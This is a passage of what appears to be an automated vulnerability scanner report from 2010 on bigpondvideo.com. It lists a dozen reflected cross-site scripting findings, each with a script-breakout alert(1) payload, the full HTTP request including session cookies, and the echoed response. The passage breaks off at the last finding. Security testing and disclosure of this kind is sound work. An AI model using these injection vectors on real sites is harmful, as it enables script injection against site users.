The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 65a0c</script><script>alert(1)</script>b2299813f32 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /NewsOnDemandOddspot/?65a0c</script><script>alert(1)</script>b2299813f32=1 HTTP/1.1
Host: bigpondvideo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: gpv_p49=BigPond%20TV; s_cc=true; s_sq=%5B%5BB%5D%5D; s_nr=1290484594824; PHPSESSID=9b7c6ddb0174e371d6c21a37721a97ca; gpv_e48=BP%3ABigPond%20TV%3AHomepage; gpv_p43=BP%3ABigPond%20TV%3AHomepage; s_sv_sid=453774846568; gpv_e44=BigPond%20TV;

Response

HTTP/1.1 200 OK
Date: Tue, 23 Nov 2010 03:08:07 GMT
Server: Apache/2.2.14 (Win32) mod_fcgid/2.3.5
X-Powered-By: PHP/5.2.13
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html
Connection: close
Content-Length: 58317

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="X-UA-C
...[SNIP]...
://www.macromedia.com/go/getflashplayer',
                                                   'wmode','transparent',
                                                   'FlashVars','randFlashId=NV4ceb30175eebc&platform=Production&phpSessionId=9b7c6ddb0174e371d6c21a37721a97ca&65a0c</script><script>alert(1)</script>b2299813f32=1&navId=714&channelTitle=Odd Spot&targetLevel=Videos.News.Odd Spot&invoke=1'+"&screenW="+screen.width+"&screenH="+screen.height); //end AC code
                           </script>
...[SNIP]...

2.470. http://bigpondvideo.com/NewsOnDemandOddspot/ [ref parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://bigpondvideo.com
Path:   /NewsOnDemandOddspot/

Issue detail

The value of the ref request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload c0da1</script><script>alert(1)</script>2b73934eb66 was submitted in the ref parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /NewsOnDemandOddspot/?ref=Net-Head-TV-OddSpotc0da1</script><script>alert(1)</script>2b73934eb66 HTTP/1.1
Host: bigpondvideo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: gpv_p49=BigPond%20TV; s_cc=true; s_sq=%5B%5BB%5D%5D; s_nr=1290484594824; PHPSESSID=9b7c6ddb0174e371d6c21a37721a97ca; gpv_e48=BP%3ABigPond%20TV%3AHomepage; gpv_p43=BP%3ABigPond%20TV%3AHomepage; s_sv_sid=453774846568; gpv_e44=BigPond%20TV;

Response

HTTP/1.1 200 OK
Date: Tue, 23 Nov 2010 03:08:01 GMT
Server: Apache/2.2.14 (Win32) mod_fcgid/2.3.5
X-Powered-By: PHP/5.2.13
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html
Connection: close
Content-Length: 58338

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="X-UA-C
...[SNIP]...
o/getflashplayer',
                                                   'wmode','transparent',
                                                   'FlashVars','randFlashId=NV4ceb3011ba74b&platform=Production&phpSessionId=9b7c6ddb0174e371d6c21a37721a97ca&ref=Net-Head-TV-OddSpotc0da1</script><script>alert(1)</script>2b73934eb66&navId=714&channelTitle=Odd Spot&targetLevel=Videos.News.Odd Spot&invoke=1'+"&screenW="+screen.width+"&screenH="+screen.height); //end AC code
                           </script>
...[SNIP]...

2.471. http://bigpondvideo.com/NewsOnDemandWorld/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://bigpondvideo.com
Path:   /NewsOnDemandWorld/

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 887a8</script><script>alert(1)</script>9959919f7ba was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /NewsOnDemandWorld/?887a8</script><script>alert(1)</script>9959919f7ba=1 HTTP/1.1
Host: bigpondvideo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Tue, 23 Nov 2010 02:48:52 GMT
Server: Apache/2.2.14 (Win32) mod_fcgid/2.3.5
X-Powered-By: PHP/5.2.13
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: PHPSESSID=aef6bad49586c834fc1eb54a9352cf0c; path=/
Content-Type: text/html
Connection: close
Content-Length: 58302

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="X-UA-C
...[SNIP]...
://www.macromedia.com/go/getflashplayer',
                                                   'wmode','transparent',
                                                   'FlashVars','randFlashId=NV4ceb2b94d27af&platform=Production&phpSessionId=aef6bad49586c834fc1eb54a9352cf0c&887a8</script><script>alert(1)</script>9959919f7ba=1&navId=707&channelTitle=World&targetLevel=Videos.News.World&invoke=1'+"&screenW="+screen.width+"&screenH="+screen.height); //end AC code
                           </script>
...[SNIP]...

2.472. http://bigpondvideo.com/NewsOnDemandWorld/ [ref parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://bigpondvideo.com
Path:   /NewsOnDemandWorld/

Issue detail

The value of the ref request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 2e602</script><script>alert(1)</script>e322c28e644 was submitted in the ref parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /NewsOnDemandWorld/?ref=Net-Head-TV-World2e602</script><script>alert(1)</script>e322c28e644 HTTP/1.1
Host: bigpondvideo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: gpv_p49=BigPond%20TV; s_cc=true; s_sq=%5B%5BB%5D%5D; s_nr=1290484594824; PHPSESSID=9b7c6ddb0174e371d6c21a37721a97ca; gpv_e48=BP%3ABigPond%20TV%3AHomepage; gpv_p43=BP%3ABigPond%20TV%3AHomepage; s_sv_sid=453774846568; gpv_e44=BigPond%20TV;

Response

HTTP/1.1 200 OK
Date: Tue, 23 Nov 2010 03:07:57 GMT
Server: Apache/2.2.14 (Win32) mod_fcgid/2.3.5
X-Powered-By: PHP/5.2.13
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html
Connection: close
Content-Length: 58321

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="X-UA-C
...[SNIP]...
/go/getflashplayer',
                                                   'wmode','transparent',
                                                   'FlashVars','randFlashId=NV4ceb300de0974&platform=Production&phpSessionId=9b7c6ddb0174e371d6c21a37721a97ca&ref=Net-Head-TV-World2e602</script><script>alert(1)</script>e322c28e644&navId=707&channelTitle=World&targetLevel=Videos.News.World&invoke=1'+"&screenW="+screen.width+"&screenH="+screen.height); //end AC code
                           </script>
...[SNIP]...

2.473. http://bigpondvideo.com/Sport/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://bigpondvideo.com
Path:   /Sport/

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 6b87f</script><script>alert(1)</script>6cfbb4de69 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /Sport/?6b87f</script><script>alert(1)</script>6cfbb4de69=1 HTTP/1.1
Host: bigpondvideo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: gpv_p49=BigPond%20TV; s_cc=true; s_sq=%5B%5BB%5D%5D; s_nr=1290484594824; PHPSESSID=9b7c6ddb0174e371d6c21a37721a97ca; gpv_e48=BP%3ABigPond%20TV%3AHomepage; gpv_p43=BP%3ABigPond%20TV%3AHomepage; s_sv_sid=453774846568; gpv_e44=BigPond%20TV;

Response

HTTP/1.1 200 OK
Date: Tue, 23 Nov 2010 03:08:17 GMT
Server: Apache/2.2.14 (Win32) mod_fcgid/2.3.5
X-Powered-By: PHP/5.2.13
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html
Connection: close
Content-Length: 58305

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="X-UA-C
...[SNIP]...
://www.macromedia.com/go/getflashplayer',
                                                   'wmode','transparent',
                                                   'FlashVars','randFlashId=NV4ceb3021ab3f4&platform=Production&phpSessionId=9b7c6ddb0174e371d6c21a37721a97ca&6b87f</script><script>alert(1)</script>6cfbb4de69=1&navId=4&channelTitle=Sport&targetLevel=Videos.Sport.All Sports&invoke=1'+"&screenW="+screen.width+"&screenH="+screen.height); //end AC code
                           </script>
...[SNIP]...

2.474. http://bigpondvideo.com/Sport/ [ref parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://bigpondvideo.com
Path:   /Sport/

Issue detail

The value of the ref request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 6b074</script><script>alert(1)</script>4642806e51f was submitted in the ref parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /Sport/?ref=Net-Head-TV-Sport6b074</script><script>alert(1)</script>4642806e51f HTTP/1.1
Host: bigpondvideo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: gpv_p49=BigPond%20TV; s_cc=true; s_sq=%5B%5BB%5D%5D; s_nr=1290484594824; PHPSESSID=9b7c6ddb0174e371d6c21a37721a97ca; gpv_e48=BP%3ABigPond%20TV%3AHomepage; gpv_p43=BP%3ABigPond%20TV%3AHomepage; s_sv_sid=453774846568; gpv_e44=BigPond%20TV;

Response

HTTP/1.1 200 OK
Date: Tue, 23 Nov 2010 03:08:17 GMT
Server: Apache/2.2.14 (Win32) mod_fcgid/2.3.5
X-Powered-By: PHP/5.2.13
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html
Connection: close
Content-Length: 58325

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="X-UA-C
...[SNIP]...
/go/getflashplayer',
                                                   'wmode','transparent',
                                                   'FlashVars','randFlashId=NV4ceb30225382c&platform=Production&phpSessionId=9b7c6ddb0174e371d6c21a37721a97ca&ref=Net-Head-TV-Sport6b074</script><script>alert(1)</script>4642806e51f&navId=4&channelTitle=Sport&targetLevel=Videos.Sport.All Sports&invoke=1'+"&screenW="+screen.width+"&screenH="+screen.height); //end AC code
                           </script>
...[SNIP]...

2.475. http://bigpondvideo.com/Top_Music_Videos/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://bigpondvideo.com
Path:   /Top_Music_Videos/

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload f3b12</script><script>alert(1)</script>62d50b7abda was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /Top_Music_Videos/?f3b12</script><script>alert(1)</script>62d50b7abda=1 HTTP/1.1
Host: bigpondvideo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Tue, 23 Nov 2010 02:48:53 GMT
Server: Apache/2.2.14 (Win32) mod_fcgid/2.3.5
X-Powered-By: PHP/5.2.13
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: PHPSESSID=3cf760cb2bf3187ae4a65139b6cdb670; path=/
Content-Type: text/html
Connection: close
Content-Length: 58328

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="X-UA-C
...[SNIP]...
://www.macromedia.com/go/getflashplayer',
                                                   'wmode','transparent',
                                                   'FlashVars','randFlashId=NV4ceb2b9572550&platform=Production&phpSessionId=3cf760cb2bf3187ae4a65139b6cdb670&f3b12</script><script>alert(1)</script>62d50b7abda=1&navId=442&channelTitle=Top Videos&targetLevel=Videos.Music.Top Videos&invoke=1'+"&screenW="+screen.width+"&screenH="+screen.height); //end AC code
                           </script>
...[SNIP]...

2.476. http://bigpondvideo.com/Top_Music_Videos/ [ref parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://bigpondvideo.com
Path:   /Top_Music_Videos/

Issue detail

The value of the ref request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload ca4fd</script><script>alert(1)</script>361f33e72d3 was submitted in the ref parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /Top_Music_Videos/?ref=Net-Head-TV-MusicVODca4fd</script><script>alert(1)</script>361f33e72d3 HTTP/1.1
Host: bigpondvideo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: gpv_p49=BigPond%20TV; s_cc=true; s_sq=%5B%5BB%5D%5D; s_nr=1290484594824; PHPSESSID=9b7c6ddb0174e371d6c21a37721a97ca; gpv_e48=BP%3ABigPond%20TV%3AHomepage; gpv_p43=BP%3ABigPond%20TV%3AHomepage; s_sv_sid=453774846568; gpv_e44=BigPond%20TV;

Response

HTTP/1.1 200 OK
Date: Tue, 23 Nov 2010 03:09:11 GMT
Server: Apache/2.2.14 (Win32) mod_fcgid/2.3.5
X-Powered-By: PHP/5.2.13
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html
Connection: close
Content-Length: 58350

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="X-UA-C
...[SNIP]...
/getflashplayer',
                                                   'wmode','transparent',
                                                   'FlashVars','randFlashId=NV4ceb3057f014c&platform=Production&phpSessionId=9b7c6ddb0174e371d6c21a37721a97ca&ref=Net-Head-TV-MusicVODca4fd</script><script>alert(1)</script>361f33e72d3&navId=442&channelTitle=Top Videos&targetLevel=Videos.Music.Top Videos&invoke=1'+"&screenW="+screen.width+"&screenH="+screen.height); //end AC code
                           </script>
...[SNIP]...

2.477. http://bigpondvideo.com/Trailers/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://bigpondvideo.com
Path:   /Trailers/

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload fd5f6</script><script>alert(1)</script>b222c324373 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /Trailers/?fd5f6</script><script>alert(1)</script>b222c324373=1 HTTP/1.1
Host: bigpondvideo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: gpv_p49=BigPond%20TV; s_cc=true; s_sq=%5B%5BB%5D%5D; s_nr=1290484594824; PHPSESSID=9b7c6ddb0174e371d6c21a37721a97ca; gpv_e48=BP%3ABigPond%20TV%3AHomepage; gpv_p43=BP%3ABigPond%20TV%3AHomepage; s_sv_sid=453774846568; gpv_e44=BigPond%20TV;

Response

HTTP/1.1 200 OK
Date: Tue, 23 Nov 2010 03:08:47 GMT
Server: Apache/2.2.14 (Win32) mod_fcgid/2.3.5
X-Powered-By: PHP/5.2.13
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html
Connection: close
Content-Length: 58363

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="X-UA-C
...[SNIP]...
://www.macromedia.com/go/getflashplayer',
                                                   'wmode','transparent',
                                                   'FlashVars','randFlashId=NV4ceb303fc9dbd&platform=Production&phpSessionId=9b7c6ddb0174e371d6c21a37721a97ca&fd5f6</script><script>alert(1)</script>b222c324373=1&navId=269&channelTitle=Movie Trailers&targetLevel=Videos.Entertainment.Movies.Movie Trailers&invoke=1'+"&screenW="+screen.width+"&screenH="+screen.height); //end AC code
                           </script>
...[SNIP]...

2.478. http://bigpondvideo.com/Trailers/ [ref parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://bigpondvideo.com
Path:   /Trailers/

Issue detail

The value of the ref request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 339a2</script><script>alert(1)</script>132f61ffc7 was submitted in the ref parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /Trailers/?ref=Net-Head-TV-Movies-Trailer339a2</script><script>alert(1)</script>132f61ffc7 HTTP/1.1
Host: bigpondvideo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: gpv_p49=BigPond%20TV; s_cc=true; s_sq=%5B%5BB%5D%5D; s_nr=1290484594824; PHPSESSID=9b7c6ddb0174e371d6c21a37721a97ca; gpv_e48=BP%3ABigPond%20TV%3AHomepage; gpv_p43=BP%3ABigPond%20TV%3AHomepage; s_sv_sid=453774846568; gpv_e44=BigPond%20TV;

Response

HTTP/1.1 200 OK
Date: Tue, 23 Nov 2010 03:08:45 GMT
Server: Apache/2.2.14 (Win32) mod_fcgid/2.3.5
X-Powered-By: PHP/5.2.13
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html
Connection: close
Content-Length: 58390

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="X-UA-C
...[SNIP]...
ashplayer',
                                                   'wmode','transparent',
                                                   'FlashVars','randFlashId=NV4ceb303d3cb50&platform=Production&phpSessionId=9b7c6ddb0174e371d6c21a37721a97ca&ref=Net-Head-TV-Movies-Trailer339a2</script><script>alert(1)</script>132f61ffc7&navId=269&channelTitle=Movie Trailers&targetLevel=Videos.Entertainment.Movies.Movie Trailers&invoke=1'+"&screenW="+screen.width+"&screenH="+screen.height); //end AC code
                           </script>
...[SNIP]...

2.479. http://bigpondvideo.com/Travel/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://bigpondvideo.com
Path:   /Travel/

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 5c278</script><script>alert(1)</script>666c1837b was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /Travel/?5c278</script><script>alert(1)</script>666c1837b=1 HTTP/1.1
Host: bigpondvideo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: gpv_p49=BigPond%20TV; s_cc=true; s_sq=%5B%5BB%5D%5D; s_nr=1290484594824; PHPSESSID=9b7c6ddb0174e371d6c21a37721a97ca; gpv_e48=BP%3ABigPond%20TV%3AHomepage; gpv_p43=BP%3ABigPond%20TV%3AHomepage; s_sv_sid=453774846568; gpv_e44=BigPond%20TV;

Response

HTTP/1.1 200 OK
Date: Tue, 23 Nov 2010 03:08:49 GMT
Server: Apache/2.2.14 (Win32) mod_fcgid/2.3.5
X-Powered-By: PHP/5.2.13
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html
Connection: close
Content-Length: 58303

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="X-UA-C
...[SNIP]...
://www.macromedia.com/go/getflashplayer',
                                                   'wmode','transparent',
                                                   'FlashVars','randFlashId=NV4ceb30414fcb1&platform=Production&phpSessionId=9b7c6ddb0174e371d6c21a37721a97ca&5c278</script><script>alert(1)</script>666c1837b=1&navId=718&channelTitle=Travel&targetLevel=Videos.Travel.All Destinations&invoke=1'+"&screenW="+screen.width+"&screenH="+screen.height); //end AC code
                           </script>
...[SNIP]...

2.480. http://bigpondvideo.com/Travel/ [ref parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://bigpondvideo.com
Path:   /Travel/

Issue detail

The value of the ref request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload c53ac</script><script>alert(1)</script>adbeb26495e was submitted in the ref parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /Travel/?ref=Net-Head-TV-Movies-Travelc53ac</script><script>alert(1)</script>adbeb26495e HTTP/1.1
Host: bigpondvideo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: gpv_p49=BigPond%20TV; s_cc=true; s_sq=%5B%5BB%5D%5D; s_nr=1290484594824; PHPSESSID=9b7c6ddb0174e371d6c21a37721a97ca; gpv_e48=BP%3ABigPond%20TV%3AHomepage; gpv_p43=BP%3ABigPond%20TV%3AHomepage; s_sv_sid=453774846568; gpv_e44=BigPond%20TV;

Response

HTTP/1.1 200 OK
Date: Tue, 23 Nov 2010 03:08:43 GMT
Server: Apache/2.2.14 (Win32) mod_fcgid/2.3.5
X-Powered-By: PHP/5.2.13
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html
Connection: close
Content-Length: 58332

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="X-UA-C
...[SNIP]...
lashplayer',
                                                   'wmode','transparent',
                                                   'FlashVars','randFlashId=NV4ceb303bb2f52&platform=Production&phpSessionId=9b7c6ddb0174e371d6c21a37721a97ca&ref=Net-Head-TV-Movies-Travelc53ac</script><script>alert(1)</script>adbeb26495e&navId=718&channelTitle=Travel&targetLevel=Videos.Travel.All Destinations&invoke=1'+"&screenW="+screen.width+"&screenH="+screen.height); //end AC code
                           </script>
...[SNIP]...

2.481. http://bigpondvideo.com/Web/Flash/carousel [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://bigpondvideo.com
Path:   /Web/Flash/carousel

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 8cd01</script><script>alert(1)</script>531404fe0b3 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /Web/Flash/carousel?8cd01</script><script>alert(1)</script>531404fe0b3=1 HTTP/1.1
Host: bigpondvideo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: gpv_p49=BigPond%20TV; s_cc=true; s_sq=%5B%5BB%5D%5D; s_nr=1290484594824; PHPSESSID=9b7c6ddb0174e371d6c21a37721a97ca; gpv_e48=BP%3ABigPond%20TV%3AHomepage; gpv_p43=BP%3ABigPond%20TV%3AHomepage; s_sv_sid=453774846568; gpv_e44=BigPond%20TV;

Response

HTTP/1.1 200 OK
Date: Tue, 23 Nov 2010 03:09:41 GMT
Server: Apache/2.2.14 (Win32) mod_fcgid/2.3.5
X-Powered-By: PHP/5.2.13
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html
Connection: close
Content-Length: 58294

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="X-UA-C
...[SNIP]...
://www.macromedia.com/go/getflashplayer',
                                                   'wmode','transparent',
                                                   'FlashVars','randFlashId=NV4ceb30764c24e&platform=Production&phpSessionId=9b7c6ddb0174e371d6c21a37721a97ca&8cd01</script><script>alert(1)</script>531404fe0b3=1&contentId=Flash&invoke=1'+"&screenW="+screen.width+"&screenH="+screen.height); //end AC code
                           </script>
...[SNIP]...

2.482. http://bigpondvideo.com/Web/Flash/carousel [rand parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://bigpondvideo.com
Path:   /Web/Flash/carousel

Issue detail

The value of the rand request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload e768d</script><script>alert(1)</script>30a0539d897 was submitted in the rand parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

